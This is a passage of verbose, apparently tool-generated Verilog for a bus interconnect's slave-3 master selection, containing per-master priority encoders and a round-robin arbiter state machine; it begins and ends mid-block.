            if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[7] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[6] ) ) } == 2'h0 ) 
            begin
                s3_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[7] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[6] ) ) } == 2'h1 ) 
                begin
                    s3_msel_pri_enc_pd3_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[7] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[6] ) ) } == 2'h2 ) 
                    begin
                        s3_msel_pri_enc_pd3_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s3_msel_pri_enc_pd3_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s3_msel_pri_enc_valid[3] or  { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[7] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[6] ) ) })
    begin
        if (  !( s3_msel_pri_enc_valid[3]) ) 
        begin
            s3_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[7] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[6] ) ) } == 2'h0 ) 
            begin
                s3_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s3_msel_pri_enc_pd3_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s3_msel_pri_enc_valid[4] or  { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[9] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[8] ) ) })
    begin
        if (  !( s3_msel_pri_enc_valid[4]) ) 
        begin
            s3_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[9] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[8] ) ) } == 2'h0 ) 
            begin
                s3_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[9] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[8] ) ) } == 2'h1 ) 
                begin
                    s3_msel_pri_enc_pd4_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[9] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[8] ) ) } == 2'h2 ) 
                    begin
                        s3_msel_pri_enc_pd4_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s3_msel_pri_enc_pd4_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s3_msel_pri_enc_valid[4] or  { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[9] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[8] ) ) })
    begin
        if (  !( s3_msel_pri_enc_valid[4]) ) 
        begin
            s3_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[9] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[8] ) ) } == 2'h0 ) 
            begin
                s3_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s3_msel_pri_enc_pd4_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s3_msel_pri_enc_valid[5] or  { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[11] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[10] ) ) })
    begin
        if (  !( s3_msel_pri_enc_valid[5]) ) 
        begin
            s3_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[11] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[10] ) ) } == 2'h0 ) 
            begin
                s3_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[11] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[10] ) ) } == 2'h1 ) 
                begin
                    s3_msel_pri_enc_pd5_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[11] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[10] ) ) } == 2'h2 ) 
                    begin
                        s3_msel_pri_enc_pd5_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s3_msel_pri_enc_pd5_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s3_msel_pri_enc_valid[5] or  { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[11] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[10] ) ) })
    begin
        if (  !( s3_msel_pri_enc_valid[5]) ) 
        begin
            s3_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[11] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[10] ) ) } == 2'h0 ) 
            begin
                s3_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s3_msel_pri_enc_pd5_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s3_msel_pri_enc_valid[6] or  { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[13] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[12] ) ) })
    begin
        if (  !( s3_msel_pri_enc_valid[6]) ) 
        begin
            s3_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[13] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[12] ) ) } == 2'h0 ) 
            begin
                s3_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[13] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[12] ) ) } == 2'h1 ) 
                begin
                    s3_msel_pri_enc_pd6_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[13] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[12] ) ) } == 2'h2 ) 
                    begin
                        s3_msel_pri_enc_pd6_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s3_msel_pri_enc_pd6_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s3_msel_pri_enc_valid[6] or  { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[13] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[12] ) ) })
    begin
        if (  !( s3_msel_pri_enc_valid[6]) ) 
        begin
            s3_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[13] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[12] ) ) } == 2'h0 ) 
            begin
                s3_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s3_msel_pri_enc_pd6_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s3_msel_pri_enc_valid[7] or  { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[15] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[14] ) ) })
    begin
        if (  !( s3_msel_pri_enc_valid[7]) ) 
        begin
            s3_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[15] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[14] ) ) } == 2'h0 ) 
            begin
                s3_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[15] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[14] ) ) } == 2'h1 ) 
                begin
                    s3_msel_pri_enc_pd7_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[15] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[14] ) ) } == 2'h2 ) 
                    begin
                        s3_msel_pri_enc_pd7_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s3_msel_pri_enc_pd7_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s3_msel_pri_enc_valid[7] or  { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[15] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[14] ) ) })
    begin
        if (  !( s3_msel_pri_enc_valid[7]) ) 
        begin
            s3_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[15] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[14] ) ) } == 2'h0 ) 
            begin
                s3_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s3_msel_pri_enc_pd7_pri_out_d0 = 4'b0010;
            end
        end
    end
    assign s3_msel_pri_enc_pri_out_tmp = ( ( ( ( ( ( ( ( ( ( s3_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd0_pri_out_d0 ) : ( s3_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s3_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd1_pri_out_d0 ) : ( s3_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s3_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd2_pri_out_d0 ) : ( s3_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s3_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd3_pri_out_d0 ) : ( s3_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s3_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd4_pri_out_d0 ) : ( s3_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s3_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd5_pri_out_d0 ) : ( s3_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s3_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd6_pri_out_d0 ) : ( s3_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s3_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd7_pri_out_d0 ) : ( s3_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) );
    always @ (  ( ( ( ( ( ( ( ( ( ( s3_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd0_pri_out_d0 ) : ( s3_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s3_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd1_pri_out_d0 ) : ( s3_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s3_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd2_pri_out_d0 ) : ( s3_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s3_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd3_pri_out_d0 ) : ( s3_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s3_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd4_pri_out_d0 ) : ( s3_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s3_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd5_pri_out_d0 ) : ( s3_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s3_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd6_pri_out_d0 ) : ( s3_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s3_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd7_pri_out_d0 ) : ( s3_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s3_msel_pri_enc_pri_out_tmp[3] ) 
        begin
            s3_msel_pri_enc_pri_out1 = 2'h3;
        end
        else
        begin 
            if ( s3_msel_pri_enc_pri_out_tmp[2] ) 
            begin
                s3_msel_pri_enc_pri_out1 = 2'h2;
            end
            else
            begin 
                if ( s3_msel_pri_enc_pri_out_tmp[1] ) 
                begin
                    s3_msel_pri_enc_pri_out1 = 2'h1;
                end
                else
                begin 
                    s3_msel_pri_enc_pri_out1 = 2'h0;
                end
            end
        end
    end
    always @ (  ( ( ( ( ( ( ( ( ( ( s3_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd0_pri_out_d0 ) : ( s3_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s3_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd1_pri_out_d0 ) : ( s3_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s3_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd2_pri_out_d0 ) : ( s3_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s3_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd3_pri_out_d0 ) : ( s3_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s3_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd4_pri_out_d0 ) : ( s3_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s3_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd5_pri_out_d0 ) : ( s3_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s3_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd6_pri_out_d0 ) : ( s3_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s3_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s3_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s3_msel_pri_enc_pd7_pri_out_d0 ) : ( s3_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s3_msel_pri_enc_pri_out_tmp[1] ) 
        begin
            s3_msel_pri_enc_pri_out0 = 2'h1;
        end
        else
        begin 
            s3_msel_pri_enc_pri_out0 = 2'h0;
        end
    end
    always @ (  posedge clk_i)
    begin
        if ( rst_i ) 
        begin
            s3_msel_pri_out <= 2'h0;
        end
        else
        begin 
            if ( s3_next ) 
            begin
                s3_msel_pri_out <= ( ( ( s3_msel_pri_enc_pri_sel == 2'd0 ) ) ? ( 2'h0 ) : ( ( ( ( s3_msel_pri_enc_pri_sel == 2'd1 ) ) ? ( s3_msel_pri_enc_pri_out0 ) : ( s3_msel_pri_enc_pri_out1 ) ) ) );
            end
        end
    end
    assign s3_msel_arb0_req = { ( s3_msel_req[7] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[15] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[14] ) ) } == 2'd0 ) ), ( s3_msel_req[6] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[13] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[12] ) ) } == 2'd0 ) ), ( s3_msel_req[5] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[11] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[10] ) ) } == 2'd0 ) ), ( s3_msel_req[4] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[9] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[8] ) ) } == 2'd0 ) ), ( s3_msel_req[3] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[7] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[6] ) ) } == 2'd0 ) ), ( s3_msel_req[2] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[5] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[4] ) ) } == 2'd0 ) ), ( s3_msel_req[1] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[3] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[2] ) ) } == 2'd0 ) ), ( s3_msel_req[0] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[1] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[0] ) ) } == 2'd0 ) ) };
    assign s3_msel_arb0_gnt = s3_msel_arb0_state;
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s3_msel_arb0_state <= s3_msel_arb0_grant0;
        end
        else
        begin 
            s3_msel_arb0_state <= s3_msel_arb0_next_state;
        end
    end
    always @ (  s3_msel_arb0_state or  { ( s3_msel_req[7] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[15] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[14] ) ) } == 2'd0 ) ), ( s3_msel_req[6] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[13] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[12] ) ) } == 2'd0 ) ), ( s3_msel_req[5] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[11] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[10] ) ) } == 2'd0 ) ), ( s3_msel_req[4] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[9] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[8] ) ) } == 2'd0 ) ), ( s3_msel_req[3] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[7] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[6] ) ) } == 2'd0 ) ), ( s3_msel_req[2] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[5] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[4] ) ) } == 2'd0 ) ), ( s3_msel_req[1] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[3] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[2] ) ) } == 2'd0 ) ), ( s3_msel_req[0] & ( { ( ( ( s3_msel_pri_sel == 2'd2 ) ) ? ( rf_conf3[1] ) : ( 1'b0 ) ), ( ( ( s3_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf3[0] ) ) } == 2'd0 ) ) } or  1'b0)
    begin
        s3_msel_arb0_next_state = s3_msel_arb0_state;
        case ( s3_msel_arb0_state ) 
        s3_msel_arb0_grant0:
        begin
            if (  !( s3_msel_arb0_req[0]) | 1'b0 ) 
            begin
                if ( s3_msel_arb0_req[1] ) 
                begin
                    s3_msel_arb0_next_state = s3_msel_arb0_grant1;
                end
                else
                begin 
                    if ( s3_msel_arb0_req[2] ) 
                    begin
                        s3_msel_arb0_next_state = s3_msel_arb0_grant2;
                    end
                    else
                    begin 
                        if ( s3_msel_arb0_req[3] ) 
                        begin
                            s3_msel_arb0_next_state = s3_msel_arb0_grant3;
                        end
                        else
                        begin 
                            if ( s3_msel_arb0_req[4] ) 
                            begin
                                s3_msel_arb0_next_state = s3_msel_arb0_grant4;
                            end
                            else
                            begin 
                                if ( s3_msel_arb0_req[5] ) 
                                begin
                                    s3_msel_arb0_next_state = s3_msel_arb0_grant5;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb0_req[6] ) 
                                    begin
                                        s3_msel_arb0_next_state = s3_msel_arb0_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb0_req[7] ) 
                                        begin
                                            s3_msel_arb0_next_state = s3_msel_arb0_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb0_grant1:
        begin
            if (  !( s3_msel_arb0_req[1]) | 1'b0 ) 
            begin
                if ( s3_msel_arb0_req[2] ) 
                begin
                    s3_msel_arb0_next_state = s3_msel_arb0_grant2;
                end
                else
                begin 
                    if ( s3_msel_arb0_req[3] ) 
                    begin
                        s3_msel_arb0_next_state = s3_msel_arb0_grant3;
                    end
                    else
                    begin 
                        if ( s3_msel_arb0_req[4] ) 
                        begin
                            s3_msel_arb0_next_state = s3_msel_arb0_grant4;
                        end
                        else
                        begin 
                            if ( s3_msel_arb0_req[5] ) 
                            begin
                                s3_msel_arb0_next_state = s3_msel_arb0_grant5;
                            end
                            else
                            begin 
                                if ( s3_msel_arb0_req[6] ) 
                                begin
                                    s3_msel_arb0_next_state = s3_msel_arb0_grant6;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb0_req[7] ) 
                                    begin
                                        s3_msel_arb0_next_state = s3_msel_arb0_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb0_req[0] ) 
                                        begin
                                            s3_msel_arb0_next_state = s3_msel_arb0_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb0_grant2:
        begin
            if (  !( s3_msel_arb0_req[2]) | 1'b0 ) 
            begin
                if ( s3_msel_arb0_req[3] ) 
                begin
                    s3_msel_arb0_next_state = s3_msel_arb0_grant3;
                end
                else
                begin 
                    if ( s3_msel_arb0_req[4] ) 
                    begin
                        s3_msel_arb0_next_state = s3_msel_arb0_grant4;
                    end
                    else
                    begin 
                        if ( s3_msel_arb0_req[5] ) 
                        begin
                            s3_msel_arb0_next_state = s3_msel_arb0_grant5;
                        end
                        else
                        begin 
                            if ( s3_msel_arb0_req[6] ) 
                            begin
                                s3_msel_arb0_next_state = s3_msel_arb0_grant6;
                            end
                            else
                            begin 
                                if ( s3_msel_arb0_req[7] ) 
                                begin
                                    s3_msel_arb0_next_state = s3_msel_arb0_grant7;
                                end
                                else
                                begin 
                                    if ( s3_msel_arb0_req[0] ) 
                                    begin
                                        s3_msel_arb0_next_state = s3_msel_arb0_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s3_msel_arb0_req[1] ) 
                                        begin
                                            s3_msel_arb0_next_state = s3_msel_arb0_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s3_msel_arb0_grant3:
        begin
            if (  !( s3_msel_arb0_req[3]) | 1'b0 ) 
            begin
                if ( s3_msel_arb0_req[4] ) 
                begin
                    s3_msel_arb0_next_state = s3_msel_arb0_grant4;
                end
                else
                begin 
                    if ( s3_msel_arb0_req[5] ) 
                    begin
